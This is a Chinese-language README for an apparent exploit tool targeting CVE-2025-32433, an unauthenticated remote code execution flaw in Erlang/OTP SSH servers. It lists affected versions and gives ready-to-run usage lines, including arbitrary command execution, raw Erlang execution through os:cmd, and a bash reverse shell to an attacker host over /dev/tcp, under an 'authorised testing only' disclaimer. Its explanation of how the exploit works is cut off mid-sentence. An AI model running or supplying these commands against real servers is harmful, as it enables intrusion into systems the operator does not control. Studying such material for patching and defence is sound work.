Erlang/OTP SSH 未经认证的远程代码执行
本仓库包含针对 CVE-2025-32433 的漏洞利用代码,这是 Erlang/OTP SSH 服务器中的一个严重未经认证的远程代码执行漏洞。
主要特性:
CVE ID: CVE-2025-32433
严重性: 严重
影响: 未经认证的远程代码执行
此漏洞允许攻击者通过发送特制的 SSH 协议消息,在无需认证的情况下在 Erlang/OTP SSH 服务器上执行任意系统命令。
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 及更早版本(可能)
# 基本命令执行
python exploit.py -t <目标IP> -p 2222 -c "whoami"
# 执行系统命令
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# 原始 Erlang 代码执行
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# 反弹 Shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target 目标IP地址(默认:127.0.0.1)
-p, --port 目标端口(默认:2222)
-c, --command 要执行的系统命令
-e, --erlang 要执行的原始Erlang代码
此版本修复了原始漏洞利用中的编码问题:
问题: 原始漏洞利用使用了 Unicode 对勾符号(✓,U+2713),导致在 Windows 上出现 GBK 编码错误:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
解决方案: 将 Unicode 字符替换为标准的 ASCII + 字符,以实现跨平台兼容。
该漏洞利用通过以下步骤工作:
os:cmd() 执行任意 Erlang 代码此漏洞利用仅用于教育和授权的安全测试目的。未经授权访问计算机系统是违法的。请负责任地使用,仅在您拥有明确测试许可的系统上使用。
MIT 许可证
由 chuzouX 修改以兼容 Windows